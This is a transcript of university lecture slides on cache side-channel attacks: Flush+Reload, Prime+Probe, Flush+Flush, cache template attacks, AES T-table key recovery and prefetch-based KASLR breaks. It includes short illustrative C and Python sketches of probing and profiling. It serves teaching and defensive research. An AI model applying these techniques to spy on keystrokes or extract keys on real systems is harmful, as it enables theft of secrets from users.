Side-Channel Security - Chapter 2: Cache Template Attacks


Transcript of Side-Channel Security - Chapter 2: Cache Template Attacks

Page 1: Side-Channel Security - Chapter 2: Cache Template Attacks

Side-Channel Security

Chapter 2: Cache Template Attacks

Daniel Gruss

March 9, 2021

Graz University of Technology

Page 2: Side-Channel Security - Chapter 2: Cache Template Attacks

TLB and Paging

• Paging: memory is translated page-wise from virtual to physical addresses

• The TLB (translation lookaside buffer) caches virtual-to-physical mappings

• The TLB has some latency

• Worst case for the cache: the mapping is not in the TLB, so it must be loaded from RAM first

• Solution: use virtual addresses instead of physical addresses for the cache


Page 4: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache indexing methods

• VIVT: virtually indexed, virtually tagged

• PIPT: physically indexed, physically tagged

• PIVT: physically indexed, virtually tagged

• VIPT: virtually indexed, physically tagged

Page 5: Side-Channel Security - Chapter 2: Cache Template Attacks

VIVT

(Diagram: the virtual address is split into a b-bit line offset, an n-bit cache index selecting one of 2^n cache sets, and a tag; per way, the stored tag is compared ("=?") against the address tag to select the data.)

• Fast

• Virtual tag is not unique (context switches)

• Shared memory can be in the cache more than once


Page 7: Side-Channel Security - Chapter 2: Cache Template Attacks

PIPT

(Diagram: the virtual address is first translated via the TLB; the resulting physical address is split into a b-bit line offset, an n-bit cache index selecting one of 2^n cache sets, and a tag; per way, the stored tag is compared ("=?") against the address tag.)

• Slow (TLB lookup needed before indexing)

• Shared memory is only once in the cache!


Page 9: Side-Channel Security - Chapter 2: Cache Template Attacks

(PIVT)

(Diagram: the cache index is taken from the physical address via the TLB, while the tag is taken from the virtual address.)

• Slow (TLB lookup for the index)

• Virtual tag is not unique (context switches)

• Shared memory can be in the cache more than once


Page 11: Side-Channel Security - Chapter 2: Cache Template Attacks

VIPT

(Diagram: the n-bit cache index comes from the page-offset bits of the virtual address, so indexing can start in parallel with the TLB lookup; the tag is compared against the physical page number (PPN) obtained via the TLB.)

• Fast

• 4 KiB pages: the last 12 bits of VA and PA are equal

• Using more index bits is impractical (same problems as VIVT)

→ Cache size ≤ #ways · page size

Page 12: Side-Channel Security - Chapter 2: Cache Template Attacks

VIPT

Virtual Address Cache

Tag Datab bitsn bitsVPN

Cache Index

TLB

PPN

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Fast

� 4 KiB pages: last 12 bits of VA and PA are equal

� Using more bits is unpractical (like VIVT)

→ Cache size ≤ # ways · page size

Page 13: Side-Channel Security - Chapter 2: Cache Template Attacks

Remarks

• L1 caches: VIVT or VIPT

• L2/L3 caches: PIPT


Page 18: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

(Diagram: attacker and victim address spaces both map the same shared line into the cache.)

step 0: attacker maps a shared library → shared memory, shared in the cache

step 1: attacker flushes the shared cache line

step 2: victim loads the data while performing an encryption

step 3: attacker reloads the data → fast access if the victim loaded the line

Page 19: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Pros: fine granularity (1 cache line)

Cons: restrictive

1. needs the clflush instruction (not available, e.g., in JavaScript)

2. needs shared memory
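The reload-and-flush step can be sketched in C on x86; this is an illustrative sketch, not code from the lecture, and THRESHOLD is a hypothetical value that must be calibrated on the target CPU:

```c
#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, __rdtscp (GCC/Clang, x86) */

/* Hypothetical hit/miss boundary in cycles; calibrate on the target CPU. */
#define THRESHOLD 150

/* Time a single load of the target cache line. */
static uint64_t timed_access(const void *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*(volatile const char *)p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* One Flush+Reload round: reload and time the shared line (step 3),
 * then flush it again for the next round (step 1).
 * Returns 1 if the reload was fast, i.e., the victim touched the line. */
int flush_reload(const void *target) {
    uint64_t dt = timed_access(target);
    _mm_clflush(target);
    return dt < THRESHOLD;
}
```

In a real attack, `target` points into a shared library mapped by both attacker and victim, and `flush_reload` is called once per monitoring interval.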

Page 20: Side-Channel Security - Chapter 2: Cache Template Attacks

Variants of Flush+Reload

• Flush+Flush [1]

• Evict+Reload [2], also on ARM [4]


Page 29: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

(Diagram: attacker address space, cache, victim address space.)

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing an encryption

step 2: attacker probes the data to determine if the set was accessed

→ fast access: the victim did not access the set; slow access: the victim accessed the set

Page 32: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Pros: less restrictive

1. no clflush instruction needed (clflush is not available, e.g., in JavaScript)

2. no shared memory needed

Cons: coarser granularity (1 cache set)
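Assuming an eviction set of WAYS congruent addresses for the victim's cache set has already been found (the hard part, addressed in the next slides), the prime and probe steps can be sketched as follows; WAYS and the use of a total probe time are illustrative choices:

```c
#include <stdint.h>
#include <x86intrin.h>  /* __rdtscp (GCC/Clang, x86) */

#define WAYS 8  /* associativity of the attacked cache; illustrative */

/* Prime: fill all ways of the target set with the attacker's lines. */
void prime(volatile char *ev[WAYS]) {
    for (int i = 0; i < WAYS; i++)
        (void)*ev[i];
}

/* Probe: re-access the eviction set and time it. A high total time means
 * some of our lines were evicted, i.e., the victim accessed the set. */
uint64_t probe(volatile char *ev[WAYS]) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    for (int i = 0; i < WAYS; i++)
        (void)*ev[i];
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
```

The probe step doubles as the next prime step, so the attacker simply alternates probing and waiting.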

Page 33: Side-Channel Security - Chapter 2: Cache Template Attacks

Issues with Prime+Probe

We need to evict cache lines without clflush or shared memory:

1. which addresses do we access to obtain congruent cache lines?

2. how do we do this without any privileges?

3. and in which order do we access them?

Page 34: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.1: Which physical addresses to access?

"LRU eviction":

• assume that the cache uses LRU replacement

• access n addresses from the same cache set to evict an n-way set

• eviction from the last-level cache → eviction from the whole hierarchy (it's inclusive!)

Page 35: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.2: Which addresses map to the same set?

slice 0 slice 1 slice 2 slice 3

H

2

offsetsettagphysical address

30

061735

11

line

� function H that maps slices is

undocumented

� reverse-engineered by [3, 6, 8]

� hash function basically an XOR

of address bits


Page 37: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.2: Which addresses map to the same set?

3 hash functions, depending on the number of cores:

(Table: for 2-core CPUs one output bit o0, for 4-core CPUs two output bits o0 and o1, and for 8-core CPUs three output bits o0, o1, and o2; each output bit is computed as an XOR of a subset of the physical address bits 6-37.)

Page 38: Side-Channel Security - Chapter 2: Cache Template Attacks

#2: Obtain information without root privileges

• the last-level cache is physically indexed

• root privileges are needed to obtain physical addresses

• use 2 MB pages → the lowest 21 bits are the same as in the virtual address

→ enough to compute the cache set
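With the low 21 bits known, the set index can be computed directly from the virtual address inside a 2 MB page; a sketch with illustrative parameters (64-byte lines, 2048 sets per slice — the actual values depend on the CPU):

```c
#include <stdint.h>

#define LINE_BITS 6   /* 64-byte cache lines */
#define SET_BITS  11  /* 2048 sets per slice; illustrative */

/* The line offset (bits 0-5) and set index (bits 6-16) lie entirely within
 * the low 21 bits, which are identical for virtual and physical addresses
 * on a 2 MB page - so no root privileges are needed. */
unsigned cache_set(uintptr_t vaddr) {
    return (unsigned)((vaddr >> LINE_BITS) & ((1u << SET_BITS) - 1));
}
```

Two virtual addresses whose low 17 bits agree in these fields are congruent (up to the slice function), e.g., any two addresses exactly 2^17 bytes apart map to the same set.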


Page 42: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

("LRU eviction" animation: successive memory accesses to a full cache set each replace the entry with the oldest timestamp.)

• LRU replacement policy: evict the oldest entry first

• a timestamp is kept for every cache line

• every access updates the timestamp


Page 53: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

("LRU eviction" animation: the same sequential access pattern no longer reliably evicts the set.)

• no LRU replacement

• only 75% success rate on Haswell

• more accesses → higher success rate, but too slow


Page 64: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.3: Cache eviction strategy

(Figure 1: access pattern over addresses a1-a9 over time. Fast and effective on Haswell. Eviction rate >99.97%.)
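One family of such eviction strategies accesses a small, overlapping window of eviction-set addresses repeatedly while sliding it across the set, instead of a single sequential pass; the sketch below uses an illustrative window size and repetition count, not the exact parameters of the figure:

```c
#include <stddef.h>

/* Sliding-window eviction sketch: access addresses i and i+1 twice each,
 * then advance the window by one. Returns the number of memory accesses
 * performed (useful for testing; the accesses themselves do the eviction). */
size_t evict(volatile char *addrs[], size_t len) {
    size_t accesses = 0;
    for (size_t i = 0; i + 1 < len; i++)
        for (int rep = 0; rep < 2; rep++) {
            (void)*addrs[i];
            (void)*addrs[i + 1];
            accesses += 2;
        }
    return accesses;
}
```

Revisiting recently accessed lines defeats non-LRU replacement policies that a single pass cannot reliably evict.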

Page 65: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache covert channels

Page 66: Side-Channel Security - Chapter 2: Cache Template Attacks

Side channels vs. covert channels

• side channel: the attacker spies on a victim process

• covert channel: communication between two processes

  • that are not supposed to communicate

  • that are collaborating

Page 67: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit cache covert channels

Ideas for 1-bit channels:

• Prime+Probe: use one cache set to transmit

  0: sender does not access the set → low access time at the receiver

  1: sender does access the set → high access time at the receiver

• Flush+Reload / Flush+Flush / Evict+Reload: use one address to transmit

  0: sender does not access the address → high access time at the receiver

  1: sender does access the address → low access time at the receiver
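The Flush+Reload variant can be sketched as a pair of per-time-slice routines; this single-process demo stands in for two processes sharing a mapped library, and THRESHOLD is a hypothetical value to calibrate:

```c
#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, __rdtscp (GCC/Clang, x86) */

#define THRESHOLD 150   /* hypothetical hit/miss boundary in cycles */

static char shared_line[64];  /* stands in for a line of a shared library */

/* Sender, once per time slice: access the line for 1, stay idle for 0. */
void send_bit(int bit) {
    if (bit)
        (void)*(volatile char *)shared_line;
}

/* Receiver, once per time slice: time a reload, then flush for the next
 * slice. A fast reload means the sender accessed the line, i.e., a 1. */
int receive_bit(void) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*(volatile char *)shared_line;
    uint64_t t1 = __rdtscp(&aux);
    _mm_clflush(shared_line);
    return (t1 - t0) < THRESHOLD;
}
```

Sender and receiver each call their routine once per agreed time slice, which is where the synchronization problem of the next slides comes in.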


Page 70: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit covert channels

• 1 bit of data, 0 bits of control?

• idea: divide time into slices (e.g., 50 µs frames)

• synchronize sender and receiver with a shared clock


Page 72: Side-Channel Security - Chapter 2: Cache Template Attacks

Problems of 1-bit covert channels

• errors? → error-correcting codes

• retransmission may be more efficient (less overhead)

• desynchronization

• the optimal transmission duration may vary


Page 74: Side-Channel Security - Chapter 2: Cache Template Attacks

Multi-bit covert channels

• combine multiple 1-bit channels

• avoid interference → higher performance

• use 1 bit for sending = true/false


Page 77: Side-Channel Security - Chapter 2: Cache Template Attacks

Packets / frames

Organize the data in packets / frames:

• some data bits

• a checksum

• a sequence number

→ keeps sender and receiver synchronized

→ allows checking whether retransmission is necessary

Page 78: Side-Channel Security - Chapter 2: Cache Template Attacks

Efficient retransmission

How can the sender know when to retransmit?

• idea: acknowledge packets (requires a backward channel)

• use some bits as a backward channel

• or use the same bits as a backward channel (sender sending bit / receiver sending bit)

• why wait for retransmission?

→ the sender should retransmit until the receiver acknowledges


Page 82: Side-Channel Security - Chapter 2: Cache Template Attacks

Raw capacity C

• number of bits per second

• measure over ≥ 1 minute

With s bits transmitted in 1 minute:

C = s / 60

Page 83: Side-Channel Security - Chapter 2: Cache Template Attacks

Bit error rate p

• count the bits that are wrong: w

• count the total bits sent: bs

• count the total bits received: br

Error rate:

p = (w + |br − bs|) / max(bs, br)

or, if br = bs:

p = w / br

Page 84: Side-Channel Security - Chapter 2: Cache Template Attacks

Capacity

True capacity T:

T = C · (1 + (1 − p) · log2(1 − p) + p · log2(p))

where C is the raw capacity and p is the bit error rate.

Page 85: Side-Channel Security - Chapter 2: Cache Template Attacks

Capacity

(Plot: true capacity versus error rate p ∈ [0, 1]; the capacity is maximal at p = 0 and p = 1 and drops to 0 at p = 0.5.)

Page 86: Side-Channel Security - Chapter 2: Cache Template Attacks

State of the art

method    raw capacity   err. rate   true capacity   env.
F+F [1]   3968 Kbps      0.840%      3690 Kbps       native
F+R [1]   2384 Kbps      0.005%      2382 Kbps       native
E+R [4]   1141 Kbps      1.100%      1041 Kbps       native
P+P [7]    601 Kbps      0.000%       601 Kbps       native
P+P [5]    600 Kbps      1.000%       552 Kbps       virt
P+P [7]    362 Kbps      0.000%       362 Kbps       native

Page 87: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache template attacks

Page 88: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

• State of the art: cache attacks are powerful

• Problem: manual identification of attack targets

• Solution: Cache Template Attacks

  • automatically find any secret-dependent cache access

  • can be used for attacks and to improve software

• Examples:

  • cache-based keylogger

  • automatic attacks on crypto algorithms


Page 92: Side-Channel Security - Chapter 2: Cache Template Attacks

Can We Build a Cache-Based Keylogger?


Page 97: Side-Channel Security - Chapter 2: Cache Template Attacks

Challenges

• How to locate key-dependent memory accesses?

• It's complicated:

  • large binaries and libraries (third-party code)

  • many libraries (gedit: 60 MB)

  • closed-source / unknown binaries

  • self-compiled binaries

• Difficult to find all exploitable addresses


Page 100: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

Profiling Phase

• preprocessing step to find exploitable addresses automatically

• w.r.t. "events" (keystrokes, encryptions, ...)

• the result is called a "Cache Template"

Exploitation Phase

• monitor the exploitable addresses


Page 102: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

(Animation: attacker and victim address spaces both map the shared library; the attacker works on one shared address at a time, starting at offset 0x0.)

1. the cache is empty

2. the attacker triggers an event (e.g., key A)

3. the attacker checks one address for cache hits ("Reload")

4. update the cache hit ratio (per event and address)

5. the attacker flushes the shared memory

6. repeat for higher accuracy

7. repeat for all events (B, C, ...)

8. continue with the next address (offset 0x40, 0x80, ...)
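The loop structure of the profiling phase can be sketched as follows; `trigger_event_stub` and `flush_reload_stub` are placeholders for the real event injection and Flush+Reload probe (their names and behavior are assumptions for illustration):

```c
#include <stddef.h>

#define EVENTS  3    /* e.g., monitored keys; illustrative */
#define REPEATS 200  /* rounds per (address, event) pair */

/* Placeholder: in the real attack this injects the event, e.g., a keystroke. */
static void trigger_event_stub(int event) { (void)event; }

/* Placeholder: in the real attack this reloads+times the shared-library line
 * at `offset` and flushes it; here event 1 always "touches" the line. */
static int flush_reload_stub(size_t offset, int event) {
    (void)offset;
    return event == 1;
}

/* Profiling phase: fill the hit matrix - the "Cache Template". */
void profile(size_t n_offsets, int hit[][EVENTS]) {
    for (size_t a = 0; a < n_offsets; a++)        /* continue with next address */
        for (int e = 0; e < EVENTS; e++)          /* repeat for all events */
            for (int r = 0; r < REPEATS; r++) {   /* repeat for accuracy */
                trigger_event_stub(e);            /* trigger the event */
                hit[a][e] += flush_reload_stub(a * 64, e);  /* reload + flush */
            }
}
```

Dividing each entry of `hit` by REPEATS yields the per-(address, event) cache hit ratios shown on the following slides.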

Page 112: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attack Demo


Page 114: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: 1 Event, 1 Address

Address: 0x7c800 — Key: n

Example: cache hit ratio for (0x7c800, n): 200 / 200


Page 116: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, 1 Address

Address: 0x7c800 — Keys: g h i j k l m n o p q r s t u v w x y z

Example: cache hit ratio for (0x7c800, u): 13 / 200

Page 117: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, 1 Address

Address

Key: g h i j k l m n o p q r s t u v w x y z

0x7c800

Distinguish n from other keys by monitoring 0x7c800
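The profiling phase above is, in essence, bookkeeping: for each (address, event) pair, trigger the event, probe the address, and record whether the probe was a cache hit. Below is a Python sketch of that bookkeeping only; the real attack obtains each timing from a Flush+Reload probe in C (rdtsc around a load after clflush), and the 150-cycle threshold and the timing lists here are hypothetical example values.

```python
# Simulation of the profiling-phase bookkeeping of a Cache Template Attack.
# In the real attack each "timing" comes from a Flush+Reload probe; here we
# use made-up cycle counts to illustrate the hit-ratio computation.

HIT_THRESHOLD = 150  # cycles; hypothetical hit/miss boundary

def hit_ratio(timings, threshold=HIT_THRESHOLD):
    """Fraction of probes classified as cache hits."""
    hits = sum(1 for t in timings if t < threshold)
    return hits / len(timings)

def build_template(measurements):
    """measurements: {(address, event): [timing, ...]} -> hit-ratio matrix."""
    return {key: hit_ratio(ts) for key, ts in measurements.items()}

# Example: address 0x7c800 always hits for key 'n', rarely for 'u'.
measurements = {
    (0x7c800, "n"): [70] * 200,               # 200/200 hits
    (0x7c800, "u"): [70] * 13 + [250] * 187,  # 13/200 hits
}
template = build_template(measurements)
```

A high hit ratio for exactly one event, as for (0x7c800, n) here, is what makes an address usable for the exploitation phase.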

Page 118: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, All Addresses

Address

Key: g h i j k l m n o p q r s t u v w x y z

Addresses: 0x7c680, 0x7c6c0, 0x7c700, 0x7c740, 0x7c780, 0x7c7c0, 0x7c800, 0x7c840, 0x7c880, 0x7c8c0, 0x7c900, 0x7c940, 0x7c980, 0x7c9c0, 0x7ca00, 0x7cb80, 0x7cc40, 0x7cc80, 0x7ccc0, 0x7cd00

Page 119: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 3: Locate AES T-Tables

AES uses T-Tables (precomputed from S-Boxes)

� 4 T-Tables

T0[k{0,4,8,12} ⊕ p{0,4,8,12}]

T1[k{1,5,9,13} ⊕ p{1,5,9,13}]

...

� If we know which entry of Ti is accessed, we know the result of ki ⊕ pi
� Known-plaintext attack (pi is known) → ki can be determined
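The first-round attack can be simulated in a few lines: with 4-byte T-table entries and 64-byte cache lines, observing which line is accessed reveals the upper 4 bits of ki ⊕ pi, and since pi is known this pins down the upper 4 bits of ki (4 bits × 16 key bytes = 64 bits of key-space reduction). A Python sketch under these assumptions (key byte and plaintexts are arbitrary example values):

```python
import random

LINE_ENTRIES = 16  # 64-byte cache line / 4-byte T-table entry = 16 entries

def observed_line(k, p):
    # Cache line index of the T-table access T[k ^ p]; this is what the
    # attacker observes via the cache side channel.
    return (k ^ p) // LINE_ENTRIES

def recover_upper_bits(key_byte, plaintexts):
    """Intersect key candidates consistent with each observed line."""
    candidates = set(range(256))
    for p in plaintexts:
        line = observed_line(key_byte, p)
        candidates &= {k for k in range(256)
                       if (k ^ p) // LINE_ENTRIES == line}
    return candidates

random.seed(0)
key_byte = 0x4f
plaintexts = [random.randrange(256) for _ in range(32)]
cands = recover_upper_bits(key_byte, plaintexts)
```

Because XOR has no carries, every plaintext yields the same constraint on the upper nibble of the key byte, so exactly the 16 candidates sharing that nibble survive; the low 4 bits must come from later rounds or brute force.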

Page 120: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 3: Locate AES T-Tables

AES T-Table implementation from OpenSSL 1.0.2

� Most addresses in two groups:

� Cache hit ratio 100% (always cache hits)

� Cache hit ratio 0% (no cache hits)

� One 4096 byte memory block:

� Cache hit ratio of 92%

� Cache hits depend on key value and plaintext value

� The T-Tables

Page 123: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template Attack

AES T-Table implementation from OpenSSL 1.0.2

� Known-plaintext attack

� Events: encryption with only one fixed key byte

� Profile each event

� Exploitation phase:

� Eliminate key candidates

� Reduction of key space in first-round attack:

� 64 bits after 16–160 encryptions

� State of the art: full key recovery after 30000 encryptions

Page 128: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 4: AES T-Table Template

Cache templates (transposed) for k0 = 0x00 and k0 = 0x55: the two key values produce clearly distinguishable hit patterns.

Page 129: Side-Channel Security - Chapter 2: Cache Template Attacks

Conclusion

� Novel technique to find any cache side-channel leakage

� Attacks

� Detect vulnerabilities

� Works on virtually all Intel CPUs

� Works even with unknown binaries

� Marks a change of perspective:

� Large scale analysis of binaries

� Large scale automated attacks

Page 133: Side-Channel Security - Chapter 2: Cache Template Attacks

Evict+Reload

� Variant of Flush+Reload with cache eviction instead of clflush

� Works on ARMv7

� Applicable to millions of devices

� Cache Template Attacks using Evict+Reload

� ARMageddon: Last-Level Cache Attacks on Mobile Devices [4]

Page 134: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Motivation

� cache attacks → many cache misses

� detect via performance counters

→ good idea, but is it good enough?

� causing a cache flush ≠ causing a cache miss
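This distinction is what Flush+Flush exploits: the attacker only ever executes clflush and times it. Since clflush is slower when the line is cached, the attacker learns about the victim's accesses without ever taking a cache miss itself. The Python sketch below models one Flush+Flush covert-channel round; the 140/100-cycle latencies and the 120-cycle threshold are hypothetical stand-ins for real clflush measurements.

```python
# Toy model of Flush+Flush: a set of cached line addresses, and a clflush
# whose (simulated) latency depends on whether the line was cached.
FLUSH_CACHED = 140    # cycles when the line was cached (hypothetical)
FLUSH_UNCACHED = 100  # cycles when it was not (hypothetical)
THRESHOLD = 120

cache = set()

def access(addr):            # sender/victim side
    cache.add(addr)

def timed_clflush(addr):     # receiver/attacker side
    t = FLUSH_CACHED if addr in cache else FLUSH_UNCACHED
    cache.discard(addr)      # clflush always evicts the line
    return t

def send_bit(addr, bit):
    if bit:
        access(addr)         # sender touches the shared line for a 1

def recv_bit(addr):
    return 1 if timed_clflush(addr) > THRESHOLD else 0

ADDR = 0x7c800
received = []
for bit in [1, 0, 1, 1, 0]:
    send_bit(ADDR, bit)
    received.append(recv_bit(ADDR))
```

Note that the receiver's clflush doubles as the reset step for the next round, which is why the loop needs no separate flush.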

Page 137: Side-Channel Security - Chapter 2: Cache Template Attacks

clflush execution time

Histogram: execution time of clflush in cycles (100-200, x-axis) vs. number of cases (y-axis), for Sandy Bridge, Ivy Bridge, and Haswell, each with a hit and a miss curve. Flushing a cached line takes measurably longer than flushing an uncached one.

Page 138: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attacker address space

Cache

Victim address space

Page 139: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attacker address space

Cache

Victim address space

cached cached

Page 140: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attacker address space

Cache

Victim address space

flushes

Page 141: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attacker address space

Cache

Victim address space

loads data

Page 142: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush

Attacker address space

Cache

Victim address space

flushes (slow)

Page 143: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Flush: Conclusion

� attacker causes no direct cache misses

→ fast

→ stealthy

� same side channel targets as Flush+Reload

� 496 KB/s covert channel

Page 146: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Attacks on mobile devices?

� powerful cache attacks on Intel x86 in the last 10 years

� nothing like Flush+Reload or Prime+Probe on mobile devices

→ why?

Page 148: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon in a nutshell

1. no flush instruction → Evict+Reload

2. pseudo-random replacement → eviction strategies from Rowhammer.js

3. cycle counters require root → new timing methods

4. last-level caches not inclusive → let L1 spill to LLC

5. multiple CPUs → remote fetches + flushes
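Point 2 is the tricky one: with pseudo-random replacement, accessing the n addresses of an n-way set once does not reliably evict the target, which is why Rowhammer.js-style eviction strategies access the eviction set repeatedly. The small Python simulation below (set size, pattern, and trial counts are illustrative, not taken from the paper) shows why repetition raises the eviction rate:

```python
import random

WAYS = 4  # associativity of the simulated cache set

def eviction_rate(pattern, trials=2000, seed=1):
    """Fraction of trials in which the victim line is evicted."""
    rng = random.Random(seed)
    evicted = 0
    for _ in range(trials):
        cache = ["victim"] + [None] * (WAYS - 1)  # victim starts cached
        for addr in pattern:
            if addr not in cache:
                cache[rng.randrange(WAYS)] = addr  # random replacement
        evicted += "victim" not in cache
    return evicted / trials

congruent = [f"ev{i}" for i in range(WAYS)]   # WAYS congruent addresses
single_pass = eviction_rate(congruent)        # each address touched once
repeated = eviction_rate(congruent * 4)       # repetition, Rowhammer.js-style
```

A single pass evicts the victim with probability 1 − (3/4)^4 ≈ 0.68 in this model, while four passes push the rate well above 80%, mirroring why eviction strategies trade more accesses for reliability.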

Page 159: Side-Channel Security - Chapter 2: Cache Template Attacks

ARMageddon Demo

Page 160: Side-Channel Security - Chapter 2: Cache Template Attacks

Prefetch Side-Channel Attacks

Page 161: Side-Channel Security - Chapter 2: Cache Template Attacks

Overview

� prefetch instructions don’t check privileges

� prefetch instructions leak timing information

exploit this to:

� locate a driver in the kernel → defeat KASLR

� translate virtual to physical addresses

Page 163: Side-Channel Security - Chapter 2: Cache Template Attacks

Intel being overspecific

NOTE

Using the PREFETCH instruction is recommended only if data does not fit in

cache. Use of software prefetch should be limited to memory addresses that are

managed or owned within the application context. Prefetching to addresses that

are not mapped to physical pages can experience non-deterministic performance

penalty. For example specifying a NULL pointer (0L) as address for a prefetch

can cause long delays.

Page 168: Side-Channel Security - Chapter 2: Cache Template Attacks

CPU Caches

Memory (DRAM) is slow compared to the CPU

� buffer frequently used memory

� every memory reference goes through the cache

� based on physical addresses

Page 169: Side-Channel Security - Chapter 2: Cache Template Attacks

Memory Access Latency

Histogram: access time in cycles (50-400, x-axis) vs. number of accesses (log scale, 10^0 to 10^7, y-axis). Cache hits cluster at low cycle counts, cache misses well above.

Page 170: Side-Channel Security - Chapter 2: Cache Template Attacks

Unprivileged cache maintenance

Optimize cache usage:

� prefetch: suggest CPU to load data into cache

� clflush: throw out data from all caches

... based on virtual addresses

Page 171: Side-Channel Security - Chapter 2: Cache Template Attacks

Software prefetching

prefetch instructions are somewhat unusual

� hints – can be ignored by the CPU

� do not check privileges or cause exceptions

but they do need to translate virtual to physical

Page 172: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel must be mapped in every address space

Today’s operating systems:

Shared address space

User memory (low addresses, from 0) | Kernel memory (high addresses, up to −1)

context switch

Page 173: Side-Channel Security - Chapter 2: Cache Template Attacks

Address translation on x86-64

48-bit virtual address: PML4 index (9 bits) | PDPT index (9 bits) | PD index (9 bits) | PT index (9 bits) | page offset (12 bits)

CR3 points to the PML4; the PML4 entry selects a PDPT, the PDPT entry a page directory, the PDE a page table, and the PTE a 4 KiB page. Each table has 512 entries; the 12-bit offset selects the byte within the page.
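The 48-bit split above is easy to sketch: each paging level consumes 9 bits (512 entries per table) and the page offset the low 12 bits. A small Python helper that decomposes a virtual address accordingly (illustrative, matching the 4-level x86-64 walk):

```python
def split_vaddr(vaddr):
    """Split a 48-bit virtual address into x86-64 paging indices."""
    offset = vaddr & 0xFFF          # 12-bit offset within the 4 KiB page
    pt     = (vaddr >> 12) & 0x1FF  # 9-bit page-table index
    pd     = (vaddr >> 21) & 0x1FF  # 9-bit page-directory index
    pdpt   = (vaddr >> 30) & 0x1FF  # 9-bit PDPT index
    pml4   = (vaddr >> 39) & 0x1FF  # 9-bit PML4 index
    return pml4, pdpt, pd, pt, offset

# Synthetic address built from known indices for illustration:
vaddr = (1 << 39) | (2 << 30) | (3 << 21) | (4 << 12) | 5
parts = split_vaddr(vaddr)
```

Reversing the construction recovers exactly the indices used to build the address, which is the invariant the page-table walk relies on.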

Page 174: Side-Channel Security - Chapter 2: Cache Template Attacks

Address Translation Caches

Each core has an ITLB and a DTLB, backed by PDE, PDPTE, and PML4E caches. Lookups proceed from the TLBs down through these translation caches, and only on a complete miss walk the page-table structures in system memory (DRAM).

Page 175: Side-Channel Security - Chapter 2: Cache Template Attacks

Address Space Layout Randomization (ASLR)

Processes A, B, and C each span addresses 0 to −1.

Same library – different offset!

Page 177: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel Address Space Layout Randomization (KASLR)

Processes A, B, and C each span addresses 0 to −1.

Same driver – different offset!

Page 179: Side-Channel Security - Chapter 2: Cache Template Attacks

Kernel direct-physical map

Virtual address space: user half (0 to 2^47 − 1) and kernel half (−2^47 to −1).

The kernel contains a direct map of the whole physical memory (0 to max. phys.).

OS X, Linux, BSD, Xen PVM (Amazon EC2)

Page 181: Side-Channel Security - Chapter 2: Cache Template Attacks

Translation-Level Oracle

Prefetch execution time in cycles by deepest cached translation level (example measurements): PDPT 230, PD 246, PT 222, cached page 181, uncached page 383.
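These timings (example values from the figure; the real numbers are machine-specific) let an attacker classify an address by timing a single prefetch: an unmapped, uncached page is slow, a cached page is fast, and the intermediate values even reveal the deepest cached paging structure. A Python sketch of that classification, using the figure's values as a hypothetical calibration profile:

```python
# Hypothetical prefetch-time profile (cycles) by deepest cached translation
# level, loosely modeled on the measurements above; real values vary per CPU.
PROFILE = {
    "cached page": 181,
    "PT": 222,
    "PDPT": 230,
    "PD": 246,
    "uncached page": 383,
}

def classify(prefetch_cycles):
    """Map a measured prefetch time to the nearest profiled level."""
    return min(PROFILE, key=lambda lvl: abs(PROFILE[lvl] - prefetch_cycles))

level = classify(223)
```

In a real attack the profile would first be calibrated on the attacker's own mapped and unmapped addresses, then applied to kernel addresses.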

Page 182: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space

Cache

Kernel space

Page 183: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space

Cache

Kernel space

cached

cached

Page 184: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space

Cache

Kernel space

flush (clflush)

Page 185: Side-Channel Security - Chapter 2: Cache Template Attacks

